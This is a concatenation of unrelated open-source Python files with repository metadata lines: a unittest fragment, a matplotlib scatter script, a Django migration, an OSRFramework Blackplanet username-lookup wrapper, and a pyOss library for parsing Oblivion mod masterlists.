assert_allclose(mu, mun)
if __name__ == "__main__":
unittest.main()
| markovmodel/msmtools | tests/analysis/impl/dense/stationary_vector_test.py | Python | lgpl-3.0 | 2,003 |
#!/usr/local/bin/ipython -i
"""
A scatter graph of grid count vs grid area.
"""
import numpy as np
import matplotlib.pyplot as plt
# extract data from csv
file_name = "../data/tdwgsp_filtered.csv"
# columns (filtered):
# 1 - star_infs
# 2 - tdwgtotals
# 3 - tdwgareas
star_infs = np.genfromtxt(file_name, delimiter=',', dtype=None, skip_header=1, usecols=1)
tdwg_count = np.genfromtxt(file_name, delimiter=',', dtype=None, skip_header=1, usecols=2)
tdwg_area = np.genfromtxt(file_name, delimiter=',', dtype=None, skip_header=1, usecols=3)
# remove "" from the text string
stars = [star[1:-1] for star in star_infs]
colours = map(lambda star_colour: 'k' if star_colour == 'BK' else 'y' if star_colour == 'GD' else 'b' if star_colour == 'BU' else 'g' if star_colour == 'GN' else 'w', stars)
fig = plt.figure()
ax = fig.add_subplot(111)
# grid_land/10000 to rescale the range
ax.scatter(tdwg_count, tdwg_area, c=colours, alpha=0.5)
ax.set_xlim(0, 250.1)
ax.set_ylim(0, 12000.1)
# uncomment to manually set ticks
# xtix = np.arange(0, 380000.1, 100000)
# ytix = np.arange(0, 1000.1, 200)
# ax.xaxis.set_ticks(xtix)
# ax.yaxis.set_ticks(ytix)
ax.set_xlabel('Number of TDWG Level 3 Code', fontsize=18)
ax.set_ylabel('Summed Area of TDWG Level 3 Code', fontsize=18)
ax.set_title('Species Geographic Range Size', fontsize=22)
ax.grid(True)
plt.show()
| Nodoka/Bioquality | graphing/tdwg_scatter.py | Python | mit | 1,350 |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-09-09 10:54
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('groups', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Event',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=30)),
('description', models.TextField()),
('subject', models.CharField(max_length=20)),
('event_type', models.CharField(choices=[('quiz', 'Quiz'), ('test', 'Test'), ('homework', 'Homework')], max_length=8)),
('due', models.DateTimeField()),
('group', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='groups.Group')),
],
),
]
| MilyMilo/sci-organizer | agenda/migrations/0001_initial.py | Python | mit | 1,029 |
# !/usr/bin/python
# -*- coding: cp1252 -*-
#
##################################################################################
#
# Copyright 2016 Félix Brezo and Yaiza Rubio (i3visio, contacto@i3visio.com)
#
# This program is part of OSRFramework. You can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##################################################################################
import argparse
import json
import re
import sys
import urllib2
import osrframework.utils.browser as browser
from osrframework.utils.platforms import Platform
class Blackplanet(Platform):
"""
A <Platform> object for Blackplanet.
"""
def __init__(self):
"""
Constructor...
"""
self.platformName = "Blackplanet"
self.tags = ["contact"]
########################
# Defining valid modes #
########################
self.isValidMode = {}
self.isValidMode["phonefy"] = False
self.isValidMode["usufy"] = True
self.isValidMode["searchfy"] = False
######################################
# Search URL for the different modes #
######################################
# Strings with the URL for each and every mode
self.url = {}
#self.url["phonefy"] = "http://anyurl.com//phone/" + "<phonefy>"
self.url["usufy"] = "http://www.blackplanet.com/" + "<usufy>"
#self.url["searchfy"] = "http://anyurl.com/search/" + "<searchfy>"
######################################
# Whether the user needs credentials #
######################################
self.needsCredentials = {}
#self.needsCredentials["phonefy"] = False
self.needsCredentials["usufy"] = False
#self.needsCredentials["searchfy"] = False
#################
# Valid queries #
#################
# Strings that will imply that the query number is not appearing
self.validQuery = {}
# The regular expression '.+' will match any query.
#self.validQuery["phonefy"] = ".*"
self.validQuery["usufy"] = ".+"
#self.validQuery["searchfy"] = ".*"
###################
# Not_found clues #
###################
# Strings that will imply that the query number is not appearing
self.notFoundText = {}
#self.notFoundText["phonefy"] = []
self.notFoundText["usufy"] = ["<title>Page not found"]
#self.notFoundText["searchfy"] = []
#########################
# Fields to be searched #
#########################
self.fieldsRegExp = {}
# Definition of regular expressions to be searched in phonefy mode
#self.fieldsRegExp["phonefy"] = {}
# Example of fields:
#self.fieldsRegExp["phonefy"]["i3visio.location"] = ""
# Definition of regular expressions to be searched in usufy mode
self.fieldsRegExp["usufy"] = {}
# Example of fields:
#self.fieldsRegExp["usufy"]["i3visio.location"] = ""
# Definition of regular expressions to be searched in searchfy mode
#self.fieldsRegExp["searchfy"] = {}
# Example of fields:
#self.fieldsRegExp["searchfy"]["i3visio.location"] = ""
################
# Fields found #
################
# This attribute will be feeded when running the program.
self.foundFields = {}
| i3visio/osrframework | osrframework/wrappers/pending/blackplanet.py | Python | agpl-3.0 | 4,164 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# This file encoding UTF-8 no BOM. このファイルの文字コードはUTF-8 BOM無しです。
################################################################################
__appname__ = "MasterlistLib"
__author__ = "Jaken<Jaken.Jarvis@gmail.com>"
__copyright__ = "Copyright 2010, Jaken"
__license__ = """
GNU General Public License v3
This file is part of pyOss.
Copyright (C) 2010 Jaken.(jaken.jarvis@gmail.com)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
__version__ = "1.0.0"
__credits__ = [
'"Jaken" <Jaken.Jarvis@gmail.com>',
]
__all__ = [
"EnumLineType",
"EnumAttributeType",
"Group",
"Block",
"Line",
"Masterlist",
]
################################################################################
# Import
################################################################################
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
import os
import codecs
import re
import copy
from chardet.universaldetector import UniversalDetector
import CommonLib
from LinkedTreeObject import LinkedTreeObject
from UserlistLib import EnumCommandType
from UserlistLib import EnumUserAttributeType
from UserlistLib import UserOperation
from UserlistLib import UserLine
from UserlistLib import Userlist
################################################################################
# Global variable
################################################################################
# [masterlist] ESM、ESPファイル検出正規表現(「>」と「<」は、ファイルとして認識させる)
regexMods = re.compile(ur"^([><]?)([^><\\%?*:\"$^]{1}[^\\><:\"/|?*]*[.](esm|esp))\s*.*$", re.IGNORECASE)
# [masterlist] コメントorコマンド行検出正規表現
regexCommand = re.compile(ur"^([><]?)([\\%?*:\"$^]{1}(?!(BeginGroup|EndGroup)))\s*(.*)$")
# [masterlist] グループ開始検出正規表現 \BeginGroup\: Post BSA
regexBeginGroup = re.compile(ur"^\\BeginGroup\\:(.*)", re.IGNORECASE)
# [masterlist] グループ終了検出正規表現 \EndGroup\\
regexEndGroup = re.compile(ur"^\\EndGroup\\\\", re.IGNORECASE)
# [masterlist補正用] BASH定義っぽい行検出正規表現
regexExBash = re.compile(ur"^([{]{2}BASH[:]\S+[}]{2}.*)$", re.IGNORECASE)
# [masterlist補正用] コメント間違いっぽい行検出正規表現
regexExComment = re.compile(ur"^/\s*(.*)")
# [masterlist補正用] ESM,ESPっぽい行検出正規表現
regexExMods1 = re.compile(ur"^(\w+(\w|[ ]|[$%'_@!()~-])+)\s*$")
# レコード判定用
regexRecord = re.compile(ur"^(((Move|Insert)(Before|After|Top|Bottom))|(AppendLine|ReplaceLine))From(MODs|Group)To(MODs|Group)$")
################################################################################
# Class
################################################################################
# ------------------------------------------------------------------------------
# EnumLineType
# ------------------------------------------------------------------------------
class EnumLineType(object):
"""
\ :class:`Line`\ クラスの行格納タイプを表現します。(列挙体ビットフィールド表現クラス)
"""
#: 判定できなかった不明な行を表します。
OTHER = 0x000000
#: 空白行を表します。
BLANK = 0x000001
#: コメント行を表します。開始行が\\マークで始まる行を表します。
SILENTCOMMENT = 0x000002
#: コマンド行を表します。*マークや%、?などの開始行が含まれます。(BeginGroup、EndGroupも対象となります。\\マークのSILENTCOMMENTは含まれません。)
COMMAND = 0x004000
COMMAND_BASHEDPATCH = 0x004010 # %
COMMAND_COMMENT = 0x004020 # ?
COMMAND_FCOM = 0x004040 # *
COMMAND_REQUIREMENT = 0x004080 # :
COMMAND_INCOMPATIBILITY = 0x004100 # "
COMMAND_OOO = 0x004200 # $
COMMAND_BETTERCITIES = 0x004400 # ^
#: グループの開始行を表します。
BEGINGROUP = 0x006100
#: グループの終了行を表します。
ENDGROUP = 0x006200
#: MODファイル名指定を表します。(ESM、ESPファイル名)
MODS = 0x008000
MODS_ESM = 0x008010 # esm
MODS_ESP = 0x008020 # esp
# FCOMインストール条件
FCOM_ISINSTALLED = 0x110000 # >
FCOM_ISNOTINSTALLED = 0x120000 # <
__slots__ = []
@staticmethod
def ToString(linetype):
"""
:param linetype: ビットフィールドの合計値
:rtype: 文字列
:return: ビットフィールドの合計値から文字列を生成して返却します。区切り記号に「|」が使われます。
"""
ret = u""
sepa = u""
if linetype == EnumLineType.OTHER:
ret = u"OTHER"
else:
# あんまり細かい表示はしない。
if (linetype & EnumLineType.BLANK) == EnumLineType.BLANK:
ret += sepa + u"BLANK"
sepa = u"|"
if (linetype & EnumLineType.SILENTCOMMENT) == EnumLineType.SILENTCOMMENT:
ret += sepa + u"SILENTCOMMENT"
sepa = u"|"
if (linetype & EnumLineType.COMMAND) == EnumLineType.COMMAND:
ret += sepa + u"COMMAND"
sepa = u"|"
if (linetype & EnumLineType.BEGINGROUP) == EnumLineType.BEGINGROUP:
ret += sepa + u"BEGINGROUP"
sepa = u"|"
if (linetype & EnumLineType.ENDGROUP) == EnumLineType.ENDGROUP:
ret += sepa + u"ENDGROUP"
sepa = u"|"
if (linetype & EnumLineType.MODS) == EnumLineType.MODS:
ret += sepa + u"MODS"
sepa = u"|"
return ret
# ------------------------------------------------------------------------------
# EnumAttributeType
# ------------------------------------------------------------------------------
class EnumAttributeType(object):
"""
\ :class:`Group`\ クラス及び\ :class:`Block`\ クラスの属性タイプを表現します。(列挙体ビットフィールド表現クラス)
"""
#: 空白行のみで構成された範囲であることを表します。
BLANKONLY = 0x0000
#: 空白行又はコマンド行のみで構成された範囲であることを表します。
COMMANDONLY = 0x0001
#: ESM、ESPを含む行で構成された範囲であることを表します。
EXISTMODS = 0x0002
__slots__ = []
# ------------------------------------------------------------------------------
# Group
# ------------------------------------------------------------------------------
class Group(LinkedTreeObject):
"""
グループオブジェクトクラス
このクラスは、BeginGroupからEndGroupまでのグループを表現します。
グループの子要素にはグループ及びブロックを内包できるものとします。
"""
def __init__(self, name = u"", childs = None, createdefault = True):
"""
:param string name: このグループの名前
:param LinkedTreeObject[] childs: 子要素に追加するLinkedTreeObjectのリスト
:param bool createdefault: このグループにBeginGroupとEndGroupの定義行を生成して追加します。
デフォルトはTrueです。通常はこのパラメータを変更する必要はありません。
"""
LinkedTreeObject.__init__(self)
#: このグループの名前を表します。(\ :meth:`LinkedTreeObject.LinkedTreeObject.Data`\ に保管します。)
self.GroupName = name
if childs != None:
if not (isinstance(childs, list)):
raise TypeError, "expected type is list."
for child in childs:
self.AddChild(child)
# childs指定でBeginGroupとEndGroupが挿入されている場合を考慮し、childsを入れてから処理を行う。
if createdefault:
# BeginGroupのチェック
beginfindflg = False
findchild = self.GetTopChild()
while findchild is not None:
if isinstance(findchild, Group):
findchild = None
elif isinstance(findchild, Block):
beginline = findchild.FindDataFunc(u"LineType", lambda v: ((v & EnumLineType.BEGINGROUP) == EnumLineType.BEGINGROUP))
if beginline != None:
if beginline.BeginGroupName != self.GroupName:
# 存在するが、グループ名が異なる場合は、入れ替える。
newbeginline = Line(ur"\BeginGroup\: %s" % (self.GroupName))
targetblock = beginline.Parent()
targetblock.ReplaceChild(beginline, newbeginline)
beginfindflg = True
break
else:
findchild = findchild.Next()
if not beginfindflg:
biginblock = Block([Line(ur"\BeginGroup\: %s" % (self.GroupName))])
if self.ChildCount() != 0:
self.InsertChildBefore(self.GetTopChild(), biginblock)
else:
self.AddChild(biginblock)
# EndGroupのチェック
endfindflg = False
findchild = self.GetBottomChild()
while findchild is not None:
if isinstance(findchild, Group):
findchild = None
elif isinstance(findchild, Block):
endline = findchild.FindDataFunc(u"LineType", lambda v: ((v & EnumLineType.ENDGROUP) == EnumLineType.ENDGROUP))
if endline != None:
endfindflg = True
break
else:
findchild = findchild.Previous()
if not endfindflg:
endblock = Block([Line(ur"\EndGroup\\")])
self.AddChild(endblock)
def __str__(self):
ret = u"%s" % (self.GroupName)
return ret
def _onAppendChild(self, leaf):
if not (isinstance(leaf, Group) or isinstance(leaf, Block)):
raise TypeError, "This object can not be added. expected Group or Block."
return self
def MasterlistOutput(self):
"""
:rtype: string
:return: Masterlist形式でこのオブジェクトと全ての子要素を出力します。
"""
return u"".join([u"%s" % (child.MasterlistOutput()) for child in self.EachChilds()])
def GetAttribute(self):
"""
このオブジェクトの属性を返却します。
グループオブジェクトは、子要素にかかわらず、常にEnumAttributeType.EXISTMODSを返却します。
:rtype: EnumAttributeType
:return: 子要素を含めたこのオブジェクトの属性を返却します。
"""
ret = EnumAttributeType.EXISTMODS
return ret
def _getWasteBlock(self):
"""
このオブジェクトの子要素から全ての不要なブロックを返却します。
不要なブロックの決定ルールは\ :meth:`Block._getWasteBlock`\ を参照してください。
:rtype: LinkedTreeObject[]
:return: 不要なブロックをリストに列挙して返却します。
"""
ret = []
for child in self.EachChilds():
ret += child._getWasteBlock()
return ret
def _getTopBaseChild(self):
"""
このグループの子要素から ESM、ESPが存在するできるだけ **先頭** のブロックを返却します。
グループの子要素にESM、ESPが存在しない場合は、空のブロックを追加し、そのブロックを返却する場合があります。
(これは基準となるブロックを返却し、前後にブロックを挿入できるように考慮したものです。
そのため、グループの先頭と末尾にはBeginGroup及びEndGroupのコマンド行が存在していることを想定しています)
:rtype: LinkedTreeObject(\ :class:`Block`\ オブジェクト、又は、\ :class:`Group`\ オブジェクト)
:return: 該当するLinkedTreeObject
"""
ret = None
topchild = self.GetTopChild()
for child in topchild.EachNext():
attribute = child.GetAttribute()
if attribute == EnumAttributeType.EXISTMODS:
ret = child
break
else:
if self.ChildCount() <= 2:
ret = Block() # dummy block
self.InsertChildAfter(topchild, ret)
else:
ret = topchild.Next()
return ret
def _getBottomBaseChild(self):
"""
このグループの子要素から ESM、ESPが存在するできるだけ **末尾** のブロックを返却します。
グループの子要素にESM、ESPが存在しない場合は、空のブロックを追加し、そのブロックを返却する場合があります。
(これは基準となるブロックを返却し、前後にブロックを挿入できるように考慮したものです。
そのため、グループの先頭と末尾にはBeginGroup及びEndGroupのコマンド行が存在していることを想定しています)
:rtype: LinkedTreeObject(\ :class:`Block`\ オブジェクト、又は、\ :class:`Group`\ オブジェクト)
:return: 該当するLinkedTreeObject
"""
ret = None
bottomchild = self.GetBottomChild()
for child in bottomchild.EachPrevious():
attribute = child.GetAttribute()
if attribute == EnumAttributeType.EXISTMODS:
ret = child
break
else:
if self.ChildCount() <= 2:
ret = Block() # dummy block
self.InsertChildBefore(bottomchild, ret)
else:
ret = bottomchild.Previous()
return ret
def AddChildToTop(self, leaf):
"""
このオブジェクトの子要素に *leaf* で指定したLinkedTreeObjectを追加します。
追加する要素は常に先頭( **BeginGroup行の直後** )に付け加えられます。このメソッドは「グループにMODs又はグループを追加する」場合に使用します。
「グループにMODsを追加する」ことと、「グループオブジェクトに子要素を追加する」ことは別の意味です。
通常の\ :meth:`LinkedTreeObject.LinkedTreeObject.AddChild`\ を使って子要素を追加することは、「グループオブジェクトに子要素を追加する」ということでしかありません。
そのため、通常のAddChildでの操作は、EndGroup行よりも後ろに子要素が追加されます。
グループにMODsを追加する場合、この動作はグループに追加したことにはならず、見落としやすい不具合になる場合がありますので注意が必要です。
このメソッドを使用すると、グループ内の行を検索し、BeginGroup行を見つけてから、挿入処理を行います。
このとき、関連する要素の親子・兄弟のリンク状態、深さなどは、子要素を含めて再帰的に再設定されます。
:param LinkedTreeObject leaf: 追加対象のLinkedTreeObject
"""
self.InsertChildBefore(self._getTopBaseChild(), leaf)
return self
def AddChildToBottom(self, leaf):
"""
このオブジェクトの子要素に *leaf* で指定したLinkedTreeObjectを追加します。
追加する要素は常に末尾( **EndGroup行の直前** )に付け加えられます。このメソッドは「グループにMODs又はグループを追加する」場合に使用します。
「グループにMODsを追加する」ことと、「グループオブジェクトに子要素を追加する」ことは別の意味です。
通常の\ :meth:`LinkedTreeObject.LinkedTreeObject.AddChild`\ を使って子要素を追加することは、「グループオブジェクトに子要素を追加する」ということでしかありません。
そのため、通常のAddChildでの操作は、EndGroup行よりも後ろに子要素が追加されます。
グループにMODsを追加する場合、この動作はグループに追加したことにはならず、見落としやすい不具合になる場合がありますので注意が必要です。
このメソッドを使用すると、グループ内の行を検索し、EndGroup行を見つけてから、挿入処理を行います。
このとき、関連する要素の親子・兄弟のリンク状態、深さなどは、子要素を含めて再帰的に再設定されます。
:param LinkedTreeObject leaf: 追加対象のLinkedTreeObject
"""
self.InsertChildAfter(self._getBottomBaseChild(), leaf)
return self
# ------------------------------------------------------------------------------
# Block
# ------------------------------------------------------------------------------
class Block(LinkedTreeObject):
"""
ブロックオブジェクトクラス
このクラスは、ESM、ESPから始まる複数行をひとまとめにしたものをブロックとして表現します。
また、ESM、ESPファイル名、BeginGroup及びEndGroupでブロックを切り替えます。
マスタリスト内を編集する際の *最小単位* となります。
ブロックの子要素には行オブジェクトのみ内包できるものとします。
"""
def __init__(self, childs = None):
"""
:param LinkedTreeObject[] childs: 子要素に追加するLinkedTreeObjectのリスト
"""
LinkedTreeObject.__init__(self)
if childs != None:
if not (isinstance(childs, list)):
raise TypeError, "expected type is list."
for child in childs:
self.AddChild(child)
def __str__(self):
ret = u""
return ret
def _onAppendChild(self, leaf):
if not (isinstance(leaf, Line)):
raise TypeError, "This object can not be added. expected type is Line."
if self.GetAttribute() == EnumAttributeType.EXISTMODS:
if leaf.GetAttribute() == EnumAttributeType.EXISTMODS:
raise ValueError, "This object can not be added. In the block, ESM and ESP can exist only one."
return self
def MasterlistOutput(self):
"""
:rtype: string
:return: Masterlist形式でこのオブジェクトと全ての子要素を出力します。
"""
return u"".join([u"%s" % (child.MasterlistOutput()) for child in self.EachChilds()])
def GetAttribute(self):
"""
このオブジェクトの属性を返却します。
ブロックオブジェクトは、子要素\ :class:`Line`\ クラスのオブジェクトを検査し、このオブジェクトの属性を決定します。
属性決定のルールは\ :meth:`Line.GetAttribute`\ を参照してください。
:rtype: EnumAttributeType
:return: 子要素を含めたこのオブジェクトの属性を返却します。
"""
ret = EnumAttributeType.BLANKONLY
for child in self.EachChilds():
attribute = child.GetAttribute()
if attribute == EnumAttributeType.COMMANDONLY:
ret = EnumAttributeType.COMMANDONLY
elif attribute == EnumAttributeType.EXISTMODS:
#commit
ret = EnumAttributeType.EXISTMODS
break
return ret
def GetLine(self, linetype):
"""
このブロックに *linetype* で指定したEnumLineTypeの行オブジェクトが存在するか検索し、結果を返却します。
:rtype: LineまたはNone
:return: 最初に一致したLineを返却します。該当するLineを発見できなかった場合はNoneを返却します。
"""
return self.FindDataFunc(u"LineType", lambda v: ((v & linetype) == linetype))
def GetLineAll(self, linetype):
"""
このブロックに *linetype* で指定したEnumLineTypeの行オブジェクトが存在するか **全て** 検索し、結果を返却します。
:rtype: Lineのリスト
:return: 一致した全てのLineをリストに列挙して返却します。
該当するLineを発見できなかった場合は空のリストを返却します。
"""
return self.FindDataAllFunc(u"LineType", lambda v: ((v & linetype) == linetype))
def _getWasteBlock(self):
"""
このオブジェクト、及び、全ての子要素から不要なブロックを返却します。
ブロックに子要素が存在しない場合は、不要なブロックとして判断します。
:rtype: LinkedTreeObject[]
:return: 不要なブロックをリストに列挙して返却します。
"""
ret = []
if self.ChildCount() == 0:
ret += [self]
else:
for child in self.EachChilds():
if not isinstance(child, Line):
ret += child._getWasteBlock()
return ret
# ------------------------------------------------------------------------------
# Line
# ------------------------------------------------------------------------------
class Line(LinkedTreeObject):
"""
行オブジェクトクラス
このクラスは、マスタリスト内の1行を1つの行オブジェクトとして表現します。
行オブジェクトに子要素を持つことはできません。
"""
def __init__(self, linestring, correction = False):
"""
:param string linestring: この行オブジェクトに格納する文字列
:param bool correction: *linestring* で指定した文字列に補正処理を行うか指定します。デフォルトはFalseです。
"""
LinkedTreeObject.__init__(self)
# --------------------------------------------------
# マスタリスト行の補正処理
# --------------------------------------------------
# 改行、空白の削除
linestring = linestring.rstrip("\r\n").lstrip().rstrip()
# 正規表現チェック
match = [regexBeginGroup.search(linestring)
,regexEndGroup.search(linestring)
,regexMods.search(linestring)
,regexCommand.search(linestring)]
if correction:
if match == [None, None, None, None]:
# 基本的に上記4つの正規表現のどれかに必ずヒットするはずだが、
# 想定外の行文字列が存在している場合がある。(マスタリストのミスと思われる)
# そこで、直せそうな行はそれっぽく修正する。修正内容があっているかどうかは不明。
matchEx = [regexExBash.search(linestring)
,regexExComment.search(linestring)
,regexExMods1.search(linestring)]
if matchEx[0] is not None:
# Bashタグを書いたが、先頭の%を書き忘れちゃった感で一杯の行
# 先頭に%を付け足す。
linestring = u"%% %s" % (matchEx[0].group(1))
# 正規表現結果書き換え
match[3] = regexCommand.search(linestring)
elif matchEx[1] is not None:
# コメントを書いたが、「\バックスラッシュ」と「/スラッシュ」を間違えた感で一杯の行
# ¥マークに書き換える。(英語圏では¥マークは\バックスラッシュに置き換えられる)
linestring = u"\\ %s" % (matchEx[1].group(1))
# 正規表現結果書き換え
match[3] = regexCommand.search(linestring)
elif matchEx[2] is not None:
# 拡張子を書き忘れた感で一杯の行
# espとみなす。(少なくともピリオドがない行はESPファイルと思われる。)
# 今のところesmではミスなさそう。
linestring = u"%s.esp" % (matchEx[2].group(1))
# 正規表現結果書き換え
match[2] = regexMods.search(linestring)
# --------------------------------------------------
# LineTypeの設定
# --------------------------------------------------
flaglists = {
u">" : EnumLineType.FCOM_ISINSTALLED,
u"<" : EnumLineType.FCOM_ISNOTINSTALLED,
u"%" : EnumLineType.COMMAND_BASHEDPATCH,
u"?" : EnumLineType.COMMAND_COMMENT,
u"*" : EnumLineType.COMMAND_FCOM,
u":" : EnumLineType.COMMAND_REQUIREMENT,
u"\"" : EnumLineType.COMMAND_INCOMPATIBILITY,
u"$" : EnumLineType.COMMAND_OOO,
u"^" : EnumLineType.COMMAND_BETTERCITIES,
u"ESM" : EnumLineType.MODS_ESM,
u"ESP" : EnumLineType.MODS_ESP,
}
linetype = EnumLineType.OTHER
begingroupname = None
if len(linestring) == 0:
# カラ行はBLANK設定
linetype |= EnumLineType.BLANK
if match[0] is not None:
linetype |= EnumLineType.BEGINGROUP
#: この行がBEGINGROUPの指定だった場合、グループ名を表します。(\ :meth:`LinkedTreeObject.LinkedTreeObject.Data`\ に保管します。)
self.BeginGroupName = u"%s" % (match[0].group(1).lstrip().rstrip())
if match[1] is not None:
linetype |= EnumLineType.ENDGROUP
if match[2] is not None:
fcom_command = u"%s" % (match[2].group(1).lstrip().rstrip())
modsname = u"%s" % (match[2].group(2).lstrip().rstrip())
modstype = u"%s" % (match[2].group(3).lstrip().rstrip().upper())
if fcom_command in flaglists:
linetype |= flaglists[fcom_command]
if modstype in flaglists:
linetype |= flaglists[modstype]
linetype |= EnumLineType.MODS
if match[3] is not None:
fcom_command = u"%s" % (match[3].group(1).lstrip().rstrip())
commandtype = u"%s" % (match[3].group(2).lstrip().rstrip())
commandmessage = u"%s" % (match[3].group(4).lstrip().rstrip())
if fcom_command in flaglists:
linetype |= flaglists[fcom_command]
if commandtype in flaglists:
linetype |= flaglists[commandtype]
if commandtype == u"\\":
linetype |= EnumLineType.SILENTCOMMENT
else:
linetype |= EnumLineType.COMMAND
#: この行の定義文字列を表します。(\ :meth:`LinkedTreeObject.LinkedTreeObject.Data`\ に保管します。)
self.LineString = linestring
#: この行の行格納タイプを表します。(\ :meth:`LinkedTreeObject.LinkedTreeObject.Data`\ に保管します。)
self.LineType = linetype
def __str__(self):
ret = u"(%s)%s" % (EnumLineType.ToString(self.LineType), self.LineString)
return ret
def _onAppendChild(self, leaf):
raise SyntaxError, "This object can not be added."
def _onRemoveChild(self, leaf):
raise SyntaxError, "This object can not be deleted."
def MasterlistOutput(self):
"""
:rtype: string
:return: Masterlist形式でこのオブジェクトと全ての子要素を出力します。
"""
return u"%s\r\n" % (self.LineString)
def GetAttribute(self):
"""
このオブジェクトの属性を返却します。
行オブジェクトは、オブジェクト生成時の\ :data:`LineType`\ によって、このオブジェクトの属性を決定します。
この行にESM、ESPファイルの定義が含まれる場合はEnumAttributeType.EXISTMODSを返却します。
ESM、ESPファイルを含まず、コマンド行が含まれる場合は、EnumAttributeType.COMMANDONLYを返却します。
それ以外の場合は、EnumAttributeType.BLANKONLYを返却します。
:rtype: EnumAttributeType
:return: 子要素を含めたこのオブジェクトの属性を返却します。
"""
ret = EnumAttributeType.BLANKONLY
if self.IsType(EnumLineType.COMMAND):
ret = EnumAttributeType.COMMANDONLY # COMMAND => COMMANDONLY
elif self.IsType(EnumLineType.MODS):
ret = EnumAttributeType.EXISTMODS # MODS => EXISTMODS
return ret
def IsType(self, linetype):
"""
このオブジェクトの行格納タイプに指定したタイプが含まれるか判断します。
:param EnumLineType linetype: 比較するEnumLineTypeの値
:rtype: bool
:return: このオブジェクトのタイプが指定したタイプと一致する場合は真を返す。一致しない場合は偽を返す。
"""
ret = False
if linetype == EnumLineType.OTHER:
ret = (self.LineType == EnumLineType.OTHER)
else:
ret = ((self.LineType & linetype) == linetype)
return ret
def GetParentGroup(self):
"""
このオブジェクトの親を辿り、最初に見つかったグループオブジェクトを返却します。
:rtype: LinkedTreeObject(\ :class:`Group`\ オブジェクト)
:return: この行オブジェクトが所属するグループオブジェクト
"""
ret = None
for parent in self.EachParent():
if isinstance(parent, Group):
ret = parent
break
return ret
def AddChild(self, leaf):
""" .. warning:: 行オブジェクトでは、このメソッドを利用できません。呼び出すと例外が発生します。 """
raise SyntaxError, "This method is not available."
def DeleteChild(self, leaf):
""" .. warning:: 行オブジェクトでは、このメソッドを利用できません。呼び出すと例外が発生します。 """
raise SyntaxError, "This method is not available."
def InsertChild(self, index, leaf):
""" .. warning:: 行オブジェクトでは、このメソッドを利用できません。呼び出すと例外が発生します。 """
raise SyntaxError, "This method is not available."
def InsertChildBefore(self, baseleaf, leaf):
""" .. warning:: 行オブジェクトでは、このメソッドを利用できません。呼び出すと例外が発生します。 """
raise SyntaxError, "This method is not available."
def InsertChildAfter(self, baseleaf, leaf):
""" .. warning:: 行オブジェクトでは、このメソッドを利用できません。呼び出すと例外が発生します。 """
raise SyntaxError, "This method is not available."
def Child(self, index):
""" .. warning:: 行オブジェクトでは、このメソッドを利用できません。呼び出すと例外が発生します。 """
raise SyntaxError, "This method is not available."
def GetChildIndex(self, leaf):
""" .. warning:: 行オブジェクトでは、このメソッドを利用できません。呼び出すと例外が発生します。 """
raise SyntaxError, "This method is not available."
def GetTopChild(self):
""" .. warning:: 行オブジェクトでは、このメソッドを利用できません。呼び出すと例外が発生します。 """
raise SyntaxError, "This method is not available."
def GetBottomChild(self):
""" .. warning:: 行オブジェクトでは、このメソッドを利用できません。呼び出すと例外が発生します。 """
raise SyntaxError, "This method is not available."
# ------------------------------------------------------------------------------
# Masterlist
# ------------------------------------------------------------------------------
class Masterlist(Group):
"""
マスタリストオブジェクトクラス
このクラスは、マスタリストを表現します。
マスタリストのテキストファイルから行を読み込み、その解析を行います。
"""
def __init__(self, fullpathfilename = u""):
"""
:param string fullpathfilename: 読み込むマスタリストのフルパスファイル名
"""
Group.__init__(self, None, None, False)
self._fullpathfilename = fullpathfilename.lstrip().rstrip()
self._encoding = "utf-8-sig"
self._recording = False
self._archiverecord = []
if len(self._fullpathfilename) != 0:
self.Load(self._fullpathfilename)
def __str__(self):
ret = u"Masterlist"
if len(self._fullpathfilename) != 0:
ret = u"Masterlist:(%s)" % (self._fullpathfilename)
return ret
def _onAppendChild(self, leaf):
if not (isinstance(leaf, Group) or isinstance(leaf, Block)):
raise TypeError, "This object can not be added. expected Group or Block."
return self
@property
def FullPathFileName(self):
"""
:rtype: string
:return: このマスタリストオブジェクトに登録されたマスタリストファイル名を返却します。
"""
return self._fullpathfilename
@property
def Encoding(self):
"""
:rtype: string
:return: このマスタリストに登録されたエンコーディング文字列を返却します。これは \ :meth:`Load`\ 及び \ :meth:`Save`\ メソッドで最後に指定したエンコーディングを返却します。
"""
return self._encoding
def AddChildToTop(self, leaf):
""" .. warning:: マスタリストオブジェクトでは、このメソッドを利用できません。呼び出すと例外が発生します。 """
raise SyntaxError, "This method is not available."
def AddChildToBottom(self, leaf):
""" .. warning:: マスタリストオブジェクトでは、このメソッドを利用できません。呼び出すと例外が発生します。 """
raise SyntaxError, "This method is not available."
def IsGroupName(self, name):
"""
このマスタリストに *name* で指定した名前のグループが存在するか検索し、結果を返却します。
:param string name: 検索対象のグループ名
:rtype: bool
:return: グループが存在する場合は真を返却します。存在しない場合は偽を返却します。
"""
ret = False
if self.FindData(u"GroupName", name) != None:
ret = True
return ret
def IsLineName(self, linestring):
"""
このマスタリストに *linestring* で指定した文字列と一致する行が存在するか検索し、結果を返却します。
:param string linestring: 検索対象の文字列
:rtype: bool
:return: 文字列が存在する場合は真を返却します。存在しない場合は偽を返却します。
"""
ret = False
if self.FindData(u"LineString", linestring) != None:
ret = True
return ret
